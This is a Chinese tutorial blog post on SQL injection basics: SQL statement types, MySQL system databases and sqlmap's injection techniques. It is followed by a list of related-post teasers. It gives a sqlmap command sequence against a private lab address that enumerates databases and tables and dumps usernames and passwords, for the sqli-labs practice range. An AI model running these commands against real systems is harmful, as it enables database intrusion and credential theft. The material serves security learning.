文章目录

  • SQL注入原理和流程
    • SQL类型
    • 获取数据库信息
    • SQL注入工具
    • 1. SQLmap常用命令使用

SQL注入原理和流程

SQL类型

  • DQL:数据查询语言(select)
  • DML:数据操作语言(insert, update, delete)
  • DDL:数据定义语言(create, drop, alter)
  • DCL:数据控制语言(grant, revoke, commit, rollback)
  • 函数:字符串函数、数字函数、日期函数
  • 运算符:算术运算符、比较运算符、逻辑运算符、位运算符

获取数据库信息

  • show命令
  • select + 函数
  • 系统库

系统库

系统库 描述
information_schema MySQL服务器所有数据库的信息
mysql 基存储数据库的用户、权限设置、关键字等
performance_schema 主要用于收集数据库服务器性能参数
sys 数据来自performance_schema

SQL注入工具

sqlmap

类型 描述
boolean-based blind 基于Boolean的盲注
time-based blind 基于时间的盲注
error-based 基于报错
UNION query-based 基于联合查询
stacked queries 基于多条SQL语句(堆叠注入)
out-of-band(OOB) 非应用内通信注入,比如DNSLog

1. SQLmap常用命令使用

sqlmap -u  http://192.168.2.200/url.php?id=1
sqlmap -u  "http://192.168.2.200/url.php?id=1" --current-db
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbs
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security"  --tables
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security" -T "users"  --col
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security" -T "users" -C "password,username" --dump

靶场: sqli-labs
支持php7的代码链接地址: sqli_labs_sqli-version

学习SQL注入系列篇(1)相关推荐

  1. 渗透学习-SQL注入篇-基础知识的学习(持续更新中)

    提示:仅供进行学习使用,请勿做出非法的行为.如若由任何违法行为,将依据法律法规进行严惩!!! 文章目录 前言 一.SQL注入产生的原因 二.手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能 ...

  2. 学习sql注入:猜测数据库_对于SQL的热爱:为什么要学习它以及它将如何帮助您...

    学习sql注入:猜测数据库 I recently read a great article by the esteemed @craigkerstiens describing why he feel ...

  3. 学习sql注入:猜测数据库_学习SQL:删除和更新数据SQL最佳实践

    学习sql注入:猜测数据库 Deleting and updating data is very common, but if performed without taking care, which ...

  4. 学习sql注入:猜测数据库_学习SQL:SQL数据类型

    学习sql注入:猜测数据库 What are SQL data types, why do we need them, and how to use them? Today, we'll try to ...

  5. SQL注入回顾篇(四)

    前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考, ...

  6. web安全学习-sql注入-针对mysql的攻击

    文章目录 1. 前言 补充:读取客户端本地文件到服务端mysql数据库 补充:利用全局日志写shell 补充:修改mysql的root密码 补充:配置远程登录 补充:低权限下读文件 补充:高版本mys ...

  7. SQL注入回顾篇(一)

    前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考, ...

  8. 学习sql注入:猜测数据库_面向数据科学家SQL:学习简单方法

    学习sql注入:猜测数据库 We don't pick a hammer and look for nails - that would be an unusual way of solving pr ...

  9. 关于DVWA的学习-SQL注入

    关于DVWA的学习-SQL注入 low Background 一般的查询语句的结构如下: SELECT column_name FROM table_name WHERE ID=$id 我们输入的内容 ...

最新文章

  1. “三巨头”齐获图灵奖!沉浮30载终于开启AI复兴时代
  2. 反思网络中的观点:太过杂乱 需要很强的甄别能力
  3. Scala Package Package Objects
  4. CodeForces - 1612A Distance
  5. python自动处理多个txt文件_怎么用python去实现几个文件中内容的并行处理
  6. 胶囊碰撞体(CapsuleCollider)
  7. 单片机实验板 c语言 打包下载,《AVR单片机开发板 实验板 C语言 视频教程 》
  8. dx逆向建模步骤_产品温度的逆向建模的系统和方法与流程
  9. 一步一步教你 https 抓包
  10. 【渝粤题库】陕西师范大学201041德育论 作业(专升本)
  11. Cadence学习之路:什么是PCB工艺的正片与负片
  12. 【Django】基于PythonWeb的Django框架设计实现天天生鲜系统-7首页界面
  13. 计算机设置ip后提示未识别网络连接,Win7出现提示“未识别的网络无Internet访问”怎么解决?...
  14. 《程序员》8月:移动开发新技术探索
  15. gcc -O0 -g 和gcc -O3 -g
  16. html页面通过flv.js实现视频监控直播和点播功能。
  17. stm32--工程结构的简单理解
  18. linux wifi设置端口号,Linux 下wifi 驱动开发(四)—— USB接口WiFi驱动浅析
  19. Mac 如何升级 Ruby 版本
  20. 异地恋的自愈系小故事:企鹅先生和北极熊小姐

热门文章

  1. 内存检测工具 MemTest 4.0
  2. Linux之文件上传和下载(两种方式)
  3. 如何应用知识管理,成就高绩效项目?
  4. 华为手机内置存储android可以删除吗,手机内置储存怎么清理 手机缓存清理教程...
  5. 中学生应该学会使用计算机作文,初中生学会选择的作文三篇
  6. 查伪输入imel1还是imel2_重新开一贴,科普下电脑知识,电脑小白们,可以来这里学习~~...
  7. qpython3.7.4版本下载_QPython OH最新版本下载-QPython OH appv3.1.0 最新版-腾牛安卓网
  8. 方舟手游怎么看最新服务器机柜销售,方舟生存进化PVX服务器怎么玩 PVX服务器规则一览...
  9. nodejs在windows下安装后npm命令无法使用的解决方法
  10. 你了解Yaf 是什么嘛?